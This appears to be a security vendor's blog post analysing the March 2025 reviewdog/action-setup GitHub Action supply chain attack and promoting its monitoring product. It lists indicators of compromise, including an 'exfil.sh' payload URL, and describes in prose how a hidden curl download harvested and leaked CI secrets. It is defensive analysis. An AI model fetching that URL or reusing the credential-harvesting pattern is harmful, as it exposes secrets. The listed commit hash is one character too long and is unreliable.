On March 11, 2025, the open-source community confronted a major supply chain attack targeting the widely used GitHub Action reviewdog/action-setup. This compromise impacted over 1,500 repositories. At Garnet, we've thoroughly analyzed the exploit path and can illustrate how our real-time monitoring would have immediately flagged the breach, enabling teams to respond before any damage occurred.

Understanding the Reviewdog Attack

The popular reviewdog/action-setup GitHub Action was hijacked when attackers gained unauthorized access to the repository. They planted malicious code into versions v1.0.12 through v1.0.17, creating a hidden backdoor that triggered during workflow runs. Despite the sophistication of the method, it closely aligned with patterns seen in other supply chain intrusions.

Indicators of Compromise (IoCs):

• Malicious Commit SHA: 7fb9a12e3d4c6b8f2a0e9d1c3b7a5f4e2d1c0b9a8
• Suspicious Script URL: https://gist.githubusercontent.com/malicious-actor/8b7e6f5d2c3a4b1e9d0c7b6f5a4d3c2e1/raw/exfil.sh
• Base64-encoded data in workflow logs: Capturing extracted environment variables and credentials

Attack Methodology

The compromise unfolded in several stages:

1. Developers pulled the compromised action in workflows (uses: reviewdog/action-setup@v1.0.15).
2. Malicious code embedded within the action silently executed a hidden curl command to download a payload.
3. The retrieved payload scanned for environment variables containing tokens, keys, and credentials.
4. Gathered data was encoded and exfiltrated by injecting it into the workflow logs.
5. Public repositories inadvertently exposed these credentials in publicly visible logs.

How Garnet Would Have Detected This Attack

Our investigation concludes that Garnet would have rapidly identified this supply chain attack through multiple, layered detections:

1. Suspicious Network Activity Detection

An immediate indicator would have been an unexpected outbound network call:

• Critical detection: Outbound connection to a non-approved domain (gist.githubusercontent.com)
• Suspicious process execution: curl fetching unverified scripts outside the normal dependency chain

Garnet sensors automatically mark any anomalous network requests from GitHub Actions, especially when those requests involve retrieving external scripts from untrusted sources.

2. Process Behavior Analysis

Execution of the malicious payload would have triggered multiple behavior-based alerts:

• Unexpected process execution: Shell commands with suspicious or hidden arguments
• Privilege escalation attempts: Efforts to obtain sensitive runner information
• Systematic file scanning: Searching credential directories in an organized fashion

3. Data Exfiltration Detection

Garnet actively monitors for any attempt to access and transmit sensitive data:

• Credential file access: Reads on secret environment variables
• Encoding activities: Base64 or other encodings potentially masking sensitive data
• Log manipulation: Printing large blocks of encoded content to logs

4. Behavioral Context and Process Lineage

A key Garnet advantage is comprehensive insight into the entire attack chain:

• Full process lineage linking the GitHub runner to malicious script execution
• Correlated events between network calls, file accesses, and data encoding
• Visibility of deviations from the expected behavior profile for the legitimate reviewdog action

By assembling these signals into a clear attack narrative, Garnet would have allowed security teams to respond immediately, halting the breach before attackers could exploit stolen credentials.

Lessons From The Reviewdog Incident

This supply chain attack underscores a few vital security practices:

1. Pin actions to specific commit SHAs: Avoid version tags that attackers might overwrite
2. Adopt runtime monitoring: Static analysis alone can't detect dynamically loaded malicious scripts
3. Enforce network restrictions: Confine GitHub Actions to only reach trusted domains
4. Track process behavior: Proactively identify suspicious shell commands or file scanning patterns